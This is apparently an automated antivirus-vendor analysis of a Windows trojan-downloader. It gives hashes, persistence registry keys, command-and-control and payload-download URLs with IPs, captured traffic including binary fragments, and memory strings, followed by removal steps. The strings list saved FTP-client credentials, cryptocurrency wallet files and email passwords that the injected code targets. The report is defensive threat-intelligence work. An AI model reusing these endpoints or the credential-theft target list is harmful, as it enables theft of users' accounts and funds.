Trojan-Downloader.Win32.Moure_1784a24cb1

by malwarelabrobot on September 12th, 2015 in Malware Descriptions.

Trojan.Win32.Yakes.lhpr (Kaspersky), Trojan.Generic.14918644 (B) (Emsisoft), Trojan-Downloader.Win32.Moure.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 1784a24cb1de74990d64c9681a0d52f9
SHA1: 0da515afb8b0e960a0d39d6050db87b0ba466e2b
SHA256: ad5f5fc0da1832175eaa589b1751b5d56c8cf6a8a1c9047821d04a4df518c655
SSDeep: 1536:stDiorTuf5 E3Pkc1f3ZVldwl8gu35ZnHUWNbM8GVD37Ue1zZaR8crQ TeNZPm/ :stDhCJ3KEBUW1Gl7xViKlN6WXIj
Size: 105984 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-08-03 21:48:15
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Downloader. A Trojan program that downloads files from the Internet without the user's knowledge and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan-Downloader creates the following process(es):

%original file name%.exe:1096
vrsvps.exe:1932
vrsvps.exe:1924

The Trojan-Downloader injects its code into the following process(es):

wuauclt.exe:656

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1096 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\vrsvps\vrsvps.exe (601 bytes)

Registry activity

The process %original file name%.exe:1096 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 F6 20 F4 A5 3E 2F BF 5D 48 ED D8 60 05 CF B1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1438627695"
"Name" = "%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

To run itself automatically each time Windows boots, the Trojan-Downloader adds the following reference to its file under the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"" = "%Documents and Settings%\%current user%\Local Settings\Application Data\vrsvps\vrsvps.exe -a"

The process vrsvps.exe:1932 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 35 A6 47 B2 E1 76 8B AE CB 41 B3 47 C5 64 AC"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1438627695"
"Name" = "vrsvps.exe"

The process vrsvps.exe:1924 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 00 EC F4 86 B9 28 38 F3 14 A3 09 76 51 4E 17"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1438627695"
"Name" = "vrsvps.exe"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name      Virtual Address  Virtual Size  Raw Size  Entropy  Section MD5
.ihuzseh  4096             83112         83456     4.84191  4469bd475345986feeb9852d888f6179
.rdata    90112            16152         16384     2.59772  e81e6e057791bc6790945f4256b44c96
.data     106496           18508         4608      1.60315  59b5f5e9b558e6eeda46d72dc9059601
.rsrc     126976           16            512       0        bf619eac0cdf3f68d496ea9344137e8b

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL                                                                                                                              IP
hxxp://pro7778.com/pro/getter.php?mode=reg&id=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&os=5132&vga=VMware SVGA II&ocl=0&skype=0  153.92.96.79
hxxp://glennmetales.com/backup/xmlrpc/css/file.exe                                                                               50.63.40.1


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /backup/xmlrpc/css/file.exe HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: glennmetales.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 11 Sep 2015 09:10:29 GMT
Server: Apache
Last-Modified: Mon, 03 Aug 2015 18:50:36 GMT
ETag: "19e00-51c6ca52fb629"
Accept-Ranges: bytes
Content-Length: 105984
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........dd.f.7.f.7
.f.7...7.f.7...7.f.7...7.f.7.f.7.f.7...7.f.7...7.f.7...7.f.7Rich.f.7..
......................PE..L...o..U.................F..........g.......
.`....@...............................................................
......................................................................
................@............`..$............................ihuzseh.D
.......F.................. ..`.rdata...?...`[email protected]..............@..@
[email protected].........................
......@..@............................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................Hl0xWBCK9Xs1kHF/alxi mMFWU
eP9lTzueOaaB1h302sN10VcA9IQylC9XZBq14A7tI2w/UCNl7MOASra1XaKpQuyHm7qrDu
6DKczOovVOMEidFsnVhpa0MpxW1mz/QcUM7gLfKi036RebenVKEMVZ FLSmJeFSFCUtx91
Xi7e9JYM5UlftcFqR084RpgAxFaeAine2CeS Yq6O3bYPwSgl5Wb0mYWUagtBapYcNA/GL
17rHhpwmUvJf/Z7EVGWKO5a3pbSHKGOnUMATKNobCdGJrDv0hb8ikw1XrwwzEMfFvymrft
GDaQKfE piPGHOiD1DFc avuxgrI6Y62HJi3zh4sRkYQjbGmfdClSApCek9JiGU1hil7Gh
b3EKz2bCTTo bk/xzaiqvnS36U2rtfskYFPSmCYy5P/mXklvsuFdEW0KfNBvTVJkj5UGhX
cX1j/C8panMaGiDRa6IM9rfYl1Gw4Q0CEA9WIulQ0FTU57sylVv00/QjfNIyyJG5Kl

<<< skipped >>>

GET /pro/getter.php?mode=reg&id=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&os=5132&vga=VMware SVGA II&ocl=0&skype=0 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: pro7778.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Sep 2015 09:10:29 GMT
Content-Type: text/html
Content-Length: 59
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.29
Vary: Accept-Encoding,User-Agent
#update;hXXp://glennmetales.com/backup/xmlrpc/css/file.exe;HTTP/1.1 20
0 OK..Server: nginx..Date: Fri, 11 Sep 2015 09:10:29 GMT..Content-Type
: text/html..Content-Length: 59..Connection: keep-alive..Vary: Accept-
Encoding..X-Powered-By: PHP/5.3.29..Vary: Accept-Encoding,User-Agent..
#update;hXXp://glennmetales.com/backup/xmlrpc/css/file.exe;..


The Trojan-Downloader connects to the servers at the following location(s):

wuauclt.exe_656:

.text
`.data
.rsrc
@.reloc
wuauclt.pdb
GetProcessHeap
KERNEL32.dll
_wcmdln
_amsg_exit
msvcrt.dll
ntdll.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
USER32.dll
OLEAUT32.dll
SHLWAPI.dll
zcÁ
version="6.0.0.0"
name="Microsoft.Windows.windowsupdate.wuauclt"
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
name="Microsoft.Windows.Common-Controls"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
wuaueng.dll
Error: 0xx. wuauclt handler: failed to spawn COM server
Error: 0xx. wuauclt handler: failed to load wuaueng
/ReportNow
/ShowWindowsUpdate
/CloseWindowsUpdate
wuauclt.exe failed to get proc address for UI export object with error %#lx
Failed to load %s with error %X
wucltui.dll
wucltux.dll
call RunAUClientUI on wucltui.dll/wucltux.dll
Ntdll.dll
WuSqm %ls session datapoint (id:%d) is incremented with dword %d.
wuauclt.exe is exiting with code 0xX
wuauclt.exe launched with command line %s
kernel32.dll
WUWeb
Report
7.6.7600.256
Global\WindowsUpdateTracingMutex
WindowsUpdate.log
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Trace
Windows
shell32.dll
%s: %s [
%s: %s
%s\%s
= Module: %s
= Module: <failed with %d>
= Process: %s
= Process: <failed with %d>
=========== Logging initialized (build: %s, tz: %s) ===========
wups2.dll
wups.dll
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Setup\ServiceStartup\
%hs %ls page "%ls", hr=%X
Microsoft.WindowsUpdate
wupdmgr.exe
Failed to cocreate IShellWindows, error = 0xlX
Failed to obtain window doc for window %d, error = 0xlX
Failed to obtain folder view for window %d, error = 0xlX
Failed to obtain folder IPersist for window %d, error = 0xlX
Window %d is NOT a WU window
Done enumerating windows
Quit for window %d failed: 0xlX
Window %d is a WU window. Attempting to close
Failed to obtain class ID for window %d, error = 0xlX
Got NULL disp interface for window %d
Got %d instead of VT_DISPATCH for window %d
Failed to obtain IWebBrowserApp for window %d, error = 0xlX
Failed to enumerate window %d, error = 0xlX
Found %d explorer windows
Closing WU explorer windows
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\VolatileData
WUAppNotificationWindows
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired\Mandatory
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\PostRebootReporting
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\Pending\
%chdhd
hd-hd-hd%chd:hd:hd:hd
Windows Update
7.6.7600.256 (winmain_wtr_wsus3sp2(oobla).120602-1459)
wuauclt.exe
Windows
Operating System

wuauclt.exe_656_rwx_000A0000_00009000:

.text
`.rdata
@.data
.reloc
ntdll.dll
kernel32.dll
KERNELBASE.dll
=#= =:=[=
Kernel32.dll
Advapi32.dll
Shlwapi.dll
Shell32.dll
User32.dll
WS2_32.dll
Winhttp.dll
Setupapi.dll
Psapi.dll
Crypt32.dll
msvcrt.dll
OpenCL.dll
hXXp://pro7778.com/pro/getter.php
mode=report
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
SysWOW64\svchost.exe
System32\wuauclt.exe
\Software\Microsoft\Windows\CurrentVersion\Run
ClassicFTP
HKCU\Software\NCH Software\ClassicFTP\FTPAccounts
CoreFTP
HKCU\Software\FTPWare\CoreFTP\Sites
FileZilla\sitemanager.xml
CuteFTP
Globalscape\CuteFTP\9.0\sm.dat
Cyberduck\Bookmarks\*.duck
FlashFXP\5\Sites.dat
FlashFXP\5\quick.dat
LeapFTP
LeapWare\LeapFTP\sites.dat
NppFTP
Notepad++\plugins\config\NppFTP\NppFTP.xml
VoyagerFTP
RhinoSoft\FTP Voyager\FTPVoyager.Archive
SmartFTP
SmartFTP\Client 2.0\Favorites\*.xml
SmartFTP\Client 2.0\Favorites\Quick Connect\*.xml
TotalCmdr
GHISLER\wcx_PTF.ini
WS_FTP
Ipswitch\WS_FTP\Sites\ws_PTF.ini
Bitcoin\wallet.dat
Litecoin\wallet.dat
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
export "
reg.exe
SMTP User
SMTP Password
IMAP Password
POP3 Password
75ed9567-aa58-4c8e-a8ea-3cad7c47ab03
vrsvps.exe


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1096
    vrsvps.exe:1932
    vrsvps.exe:1924

  2. Delete the original Trojan-Downloader file.
  3. Delete or disinfect the following files created/modified by the Trojan-Downloader:

    %Documents and Settings%\%current user%\Local Settings\Application Data\vrsvps\vrsvps.exe (601 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "" = "%Documents and Settings%\%current user%\Local Settings\Application Data\vrsvps\vrsvps.exe -a"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
